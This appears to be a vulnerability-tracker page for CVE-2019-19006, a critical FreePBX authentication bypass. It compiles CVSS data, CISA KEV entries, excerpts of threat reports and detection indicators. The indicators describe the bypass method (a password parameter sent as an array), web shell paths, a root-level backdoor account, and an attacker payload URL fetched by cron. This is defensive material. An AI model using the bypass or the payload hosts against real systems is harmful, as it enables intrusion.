CVE-2019-19006
published 2019-11-21CVE-2019-19006: Sangoma FreePBX 115.0.16.26 and below, 14.0.13.11 and below, 13.0.197.13 and below have Incorrect Access Control.
PriorityP186critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2026-02-24
Exploited in the wild
EPSS
36.61%
98.3th percentile
Sangoma FreePBX 115.0.16.26 and below, 14.0.13.11 and below, 13.0.197.13 and below have Incorrect Access Control.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sangoma | freepbx | 13.0.0.0 – 13.0.197.13 | — |
| sangoma | freepbx | 14.0.0.0 – 14.0.13.11 | — |
| sangoma | freepbx | 15.0.0.0 – 15.0.16.26 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →CVE-2019-19006 exploitation can be detected by monitoring HTTP login requests to FreePBX where the 'password' parameter is sent as an array element (e.g., password[0]=<any_value>), which bypasses authentication by preventing session teardown. ↗
- →Detect EncystPHP web shell presence by scanning for ajax.php files in non-standard FreePBX paths such as /var/www/html/digium_phones/, /var/www/html/phones/, /var/www/html/fpbxphones/, /var/www/html/freepbxphones/, /var/www/html/freepbx/, and /var/www/html/admin/assets/. ↗
- →Alert on creation of a Linux user named 'newfpbx' with UID/GID 0 (root-equivalent), which is a persistence indicator for EncystPHP. ↗
- →Monitor for the MD5-hashed credential check pattern in PHP files on FreePBX hosts; the EncystPHP web shell uses a hard-coded MD5 hash for authentication under an interface titled 'Ask Master'. ↗
- →Detect suspicious crontab entries that repeatedly download k.php from external IPs to /var/lib/asterisk/bin/ paths (zen2, devnull2, devnull), which are persistence indicators for EncystPHP. ↗
- →Check Point IPS signature 'Sangoma FreePBX Authentication Bypass (CVE-2019-19006)' can be used to detect exploitation attempts against vulnerable FreePBX servers. ↗
- →Monitor for SIPVicious svmap scanning activity targeting FreePBX systems, as this tool is used by INJ3CTOR3 to identify vulnerable targets prior to CVE-2019-19006 exploitation. ↗
- →Detect timestamp-forging activity on FreePBX web directories: alert on 'touch' commands referencing ajax.php against legitimate footer.php timestamps, used by EncystPHP to evade detection. ↗
- ·The EncystPHP campaign described in the Fortinet report exploits CVE-2025-64328, not CVE-2019-19006 directly; the association with CVE-2019-19006 is historical (INJ3CTOR3 threat actor attribution). IOCs from the Fortinet report are operationally linked to the same threat actor but not to the original 2019 CVE exploitation infrastructure. ↗
- ·The download URL http://45.143.220.116/emo1.sh returned HTTP 404 at time of Check Point Research analysis; its purpose was unknown and the IOC may no longer be active. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-85h5-chmw-697j: Sangoma FreePBX 115
ghsa_unreviewed·2022-05-24
CVE-2019-19006 [HIGH] CWE-287 GHSA-85h5-chmw-697j: Sangoma FreePBX 115
Sangoma FreePBX 115.0.16.26 and below, 14.0.13.11 and below, 13.0.197.13 and below have Incorrect Access Control.
VulnCheck
Sangoma FreePBX Improper Authentication Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-19006 [CRITICAL] CWE-287 Sangoma FreePBX Improper Authentication Vulnerability
Sangoma FreePBX Improper Authentication Vulnerability
Sangoma FreePBX contains an improper authentication vulnerability that potentially allows unauthorized users to bypass password authentication and access services provided by the FreePBX admin.
Affected: Sangoma FreePBX
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://research.checkpoint.com/2020/inj3ctor3-operation-leveraging-asterisk-servers-for-monetization/; https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2026-02-24
CISA
Sangoma FreePBX Improper Authentication Vulnerability
cisa·2026-02-03·CVSS 9.8
CVE-2019-19006 [CRITICAL] CWE-287 Sangoma FreePBX Improper Authentication Vulnerability
Vulnerability: Sangoma FreePBX Improper Authentication Vulnerability
Affected: Sangoma FreePBX
Sangoma FreePBX contains an improper authentication vulnerability that potentially allows unauthorized users to bypass password authentication and access services provided by the FreePBX admin.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://wiki.freepbx.org/display/FOP/2019-11-20%2BRemote%2BAdmin%2BAuthentication%2BBypass ; https://nvd.nist.gov/vuln/detail/CVE-2019-19006
Remediation Due Date: 2026-02-24
No detection rules found.
No public exploits indexed.
Fortinet
Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
blogs_fortinet·2026-01-28·CVSS 9.8
[CRITICAL] Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Unveiling the Weaponized Web Shell EncystPHP
A persistent FreePBX web shell enabling long-term administrative compromise
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Incidents
Malware Analysis
Conclusion
Fortinet Protections
IOCs
URLs
Hosts
Files
MITRE ATT&CK Mapping for EncystPHP Campaign
By Vincent Li | January 28, 2026
Affected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December
Fortinet
Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
blogs_fortinet·2026-01-28·CVSS 9.8
[CRITICAL] Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
FortiGuard Labs Threat Research
# Unveiling the Weaponized Web Shell EncystPHP
A persistent FreePBX web shell enabling long-term administrative compromise
FortiGuard Security Portfolio
2025 Threat Landscape Report
By
Vincent Li
| January 28, 2026
- Article Contents
By
Vincent Li
| January 28, 2026
Affected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December last year and propagated via exploitation of the FreePBX v
Checkpoint
9th November – Threat Intelligence Bulletin
blogs_checkpoint·2020-11-09
CVE-2019-19006 9th November – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 9th November – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 9th November, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research has alerted against a wave of ransomware attacks targeting Israeli companies and corporations, using known ransomware families such as REvil and Ryuk, as well as a new family called ‘Pay2Key’. The ransomware is capable of rapid lateral movement within the company network.
Check Point SandBlast Agen
Checkpoint
INJ3CTOR3 Operation – Leveraging Asterisk Servers for Monetization
blogs_checkpoint·2020-11-05·CVSS 9.8
CVE-2019-19006 [CRITICAL] INJ3CTOR3 Operation – Leveraging Asterisk Servers for Monetization
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## INJ3CTOR3 Operation – Leveraging Asterisk Servers for Monetization
Research by : Ido Solomon, Ori Hamama and Omer Ventura, Network Research
## Intro
Recently, Check Point Research enco
Threat Intel
INJ3CTOR3
threat_intel·CVSS 9.8
CVE-2019-19006 [CRITICAL] INJ3CTOR3
# Threat Actor: INJ3CTOR3
## Description
INJ3CTOR3 is a threat actor first identified in 2020, known for targeting vulnerabilities in VoIP systems, specifically CVE-2019-19006 and CVE-2021-45461. Their operations involve exploiting FreePBX vulnerabilities to deploy PHP web shells for data exfiltration and persistence. The group utilizes tools for SIP server exploitation, including brute-force scripts and authentication bypass techniques. Observations indicate a resurgence of their attack patterns, reflecting historical behaviors while adapting to current vulnerabilities.
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
NoiseLetter February 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
NCSC
Organisational use of Enterprise Connected Devices
ncsc·2022-05-10
Organisational use of Enterprise Connected Devices
Report Download & print article PDF Download & print article PDF
## Organisational use of Enterprise Connected Devices Assessing the cyber security threat to UK organisations using Enterprise Connected Devices.
## Introduction
This paper aims to provide an assessment of the current cyber security threat to Enterprise Connected Devices. This information will be of interest to industry and any person using a connected device.
Devices used and deployed by organisations have changed dramatically in recent years. From enabling remote and flexible working to improving efficiency and productivity, these devices are broad in scope and frequently rely on their ability to be connected; with this comes increased risk.
In collaboration with DCMS, the NCSC have begun the process of assessing the l
https://community.freepbx.org/t/freepbx-security-vulnerability-sec-2019-001/62772https://pastebin.com/2CdsQMKWhttps://wiki.freepbx.org/display/FOP/2019-11-20+Remote+Admin+Authentication+Bypasshttps://www.freepbx.org/category/blog/https://community.freepbx.org/t/freepbx-security-vulnerability-sec-2019-001/62772https://pastebin.com/2CdsQMKWhttps://wiki.freepbx.org/display/FOP/2019-11-20+Remote+Admin+Authentication+Bypasshttps://www.freepbx.org/category/blog/https://research.checkpoint.com/2020/inj3ctor3-operation-leveraging-asterisk-servers-for-monetization/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-19006
2019-11-21
Published
2026-02-03
Added to CISA KEV
Exploited in the wild